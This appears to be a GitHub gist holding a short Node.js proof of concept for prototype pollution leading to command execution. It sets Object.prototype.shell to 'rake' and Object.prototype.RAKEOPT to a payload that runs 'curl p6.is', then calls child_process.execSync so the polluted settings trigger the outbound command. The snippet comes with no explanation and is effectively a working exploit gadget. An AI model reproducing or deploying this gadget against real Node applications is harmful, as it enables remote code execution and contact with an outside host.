Skip to content

Instantly share code, notes, and snippets.

@po6ix
Created August 17, 2020 06:28
Show Gist options
  • Save po6ix/a1cb0d1ac7aa8093072302a20ef326fb to your computer and use it in GitHub Desktop.
Save po6ix/a1cb0d1ac7aa8093072302a20ef326fb to your computer and use it in GitHub Desktop.
2.js
const child_process = require('child_process');
Object.prototype.RAKEOPT = '-e "print `curl p6.is`"';
Object.prototype.shell = 'rake';
child_process.execSync('env');
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment